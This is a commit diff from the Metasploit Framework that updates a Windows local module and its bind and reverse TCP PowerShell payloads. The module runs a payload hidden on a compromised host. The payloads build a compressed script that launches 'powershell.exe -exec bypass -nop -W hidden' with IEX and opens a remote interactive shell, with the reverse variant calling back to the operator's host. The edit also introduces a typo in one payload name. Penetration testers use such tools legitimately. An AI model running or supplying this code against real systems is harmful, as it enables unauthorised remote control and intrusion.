Updated payloads and fixed msftidy.

Author: benpturner

modules/exploits/windows/local/interactive_powershell.rb

@@ -54,60 +54,22 @@ def exploit
     payload = datastore['PAYLOAD']
 
     # sysinfo is only on meterpreter sessions
-    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+    vprint_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
 
     # Check that the payload is a Windows one and on the list
-    if not  session.framework.payloads.keys.grep(/windows/).include?(datastore['PAYLOAD'])
+    if not session.framework.payloads.keys.grep(/windows/).include?(datastore['PAYLOAD'])
       print_error("The Payload specified #{datastore['PAYLOAD']} is not a valid for this system")
       return
     end
 
-    pay = client.framework.payloads.create(payload)
-    pay.datastore['LHOST'] = lhost
-    pay.datastore['LPORT'] = lport
-    pay.datastore['RHOST'] = rhost
-    
-    raw = pay.generate
+    raw = generate_payload.raw
     res = session.sys.process.execute("#{raw}", nil, 'Hidden' => true, 'Channelized' => false)
     fail_with(Failure::Unknown,'Failed to start powershell process') unless res && res.pid
     computer_name = session.sys.config.sysinfo['Computer']
     vprint_status("Started PowerShell on #{computer_name} - PID: #{res.pid}")
 
-    if datastore['LHOST'].to_s.empty?
+    if session.framework.payloads.keys.grep(/bind/).include?(datastore['PAYLOAD'])
       print_status("Attemping to connect to #{rhost}:#{lport}...")
-      ctimeout = 10
-      stime = Time.now.to_i
-      last_error = nil
-
-      while stime + ctimeout > Time.now.to_i
-        Rex::ThreadSafe.sleep(2)
-        begin
-          client = Rex::Socket::Tcp.create(
-            'PeerHost' => rhost,
-            'PeerPort' => lport.to_i,
-            'Proxies'  => datastore['Proxies'],
-            'Context'  =>
-              {
-                'Msf'        => framework,
-                'MsfPayload' => payload_instance,
-                'MsfExploit' => self
-              })
-        rescue ::EOFError, Errno::ETIMEDOUT, Errno::ECONNRESET, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error => e
-          last_error = e
-        end
-
-        if client
-          handler(client)
-          return
-        end
-      end
-      print_warning("If a shell is unsuccesful, ensure you have access to the target host and port.")
-      print_status("Try adding a route to the host: `route help`")
-      if last_error
-        raise last_error
-      else
-        fail_with(Failure::Unknown, "Unable to connect")
-      end
     else
       print_status("Waiting for connection from #{rhost}:#{lport}...")
     end

modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb

@@ -15,8 +15,8 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Windows Interactive Powershell Session, Bind TCP',
-      'Description'   => 'Listen for a connection and spawn an interactive powershell session',
+      'Name'          => 'Windows Interactive Powershell Session, Bins TCP',
+      'Description'   => 'Interacts with a powershell session on an established socket connection',
       'Author'        =>
         [
           'Ben Turner', # benpturner
@@ -47,6 +47,7 @@ def initialize(info = {})
 
   def generate
     lport = datastore['LPORT']
+    lhost = datastore['LHOST']
 
     template_path = File.join(
     Msf::Config.data_directory,
@@ -62,14 +63,15 @@ def generate
     if datastore['LOAD_MODULES']
       mods_array = datastore['LOAD_MODULES'].to_s.split(',')
       mods_array.collect(&:strip)
-      print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
+      vprint_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
       mods_array.each {|m| vprint_good " #{m}"}
       mods = "\"#{mods_array.join("\",\n\"")}\""
       script_in << " -Download true\n"
     end
 
     script_in.gsub!('MODULES_REPLACE', mods)
-    script_in.gsub!('LPORTs_REPLACE', lport.to_s)
+    script_in.gsub!('LPORT_REPLACE', lport.to_s)
+    script_in.gsub!('LHOST_REPLACE', lhost.to_s)
 
     script = Rex::Powershell::Command.compress_script(script_in)
     "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"

modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb

@@ -15,7 +15,7 @@ module Metasploit3
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Windows Interactive Powershell Session, Bind TCP',
+      'Name'          => 'Windows Interactive Powershell Session, Reverse TCP',
       'Description'   => 'Interacts with a powershell session on an established socket connection',
       'Author'        =>
         [
@@ -63,7 +63,7 @@ def generate
     if datastore['LOAD_MODULES']
       mods_array = datastore['LOAD_MODULES'].to_s.split(',')
       mods_array.collect(&:strip)
-      print_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
+      vprint_status("Loading #{mods_array.count} modules into the interactive PowerShell session")
       mods_array.each {|m| vprint_good " #{m}"}
       mods = "\"#{mods_array.join("\",\n\"")}\""
       script_in << " -Download true\n"